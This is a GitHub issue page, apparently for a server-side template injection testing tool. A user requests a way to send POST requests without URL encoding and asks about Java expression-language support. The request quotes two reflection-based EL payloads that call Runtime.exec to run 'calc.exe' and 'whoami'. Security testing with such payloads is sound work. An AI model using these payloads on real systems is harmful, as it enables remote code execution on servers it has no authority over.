-
Notifications
You must be signed in to change notification settings - Fork 138
Open
Labels
awaits confirmationThe issue is supposed to be resolved, but requires some testingThe issue is supposed to be resolved, but requires some testingdelayedThe issue will be fixed with a big update laterThe issue will be fixed with a big update laterenhancementNew feature or requestNew feature or requesttemplate engineA template engine to addA template engine to add
Description
Hi! Your tool is awesome. I was playing along with it and it is very good on GET web request. And i think it will be pretty awesome to have an option of not URL encoding the POST web request.
This one here is out of topic but does this tool also support expression language like on swisskyrepo's SSTI EL code execution?
// Method using Reflection & Invoke
${"".getClass().forName("java.lang.Runtime").getMethods()[6].invoke("".getClass().forName("java.lang.Runtime")).exec("calc.exe")}
${''.getClass().forName('java.lang.Runtime').getMethods()[6].invoke(''.getClass().forName('java.lang.Runtime')).exec('whoami')}
@
Metadata
Metadata
Assignees
Labels
awaits confirmationThe issue is supposed to be resolved, but requires some testingThe issue is supposed to be resolved, but requires some testingdelayedThe issue will be fixed with a big update laterThe issue will be fixed with a big update laterenhancementNew feature or requestNew feature or requesttemplate engineA template engine to addA template engine to add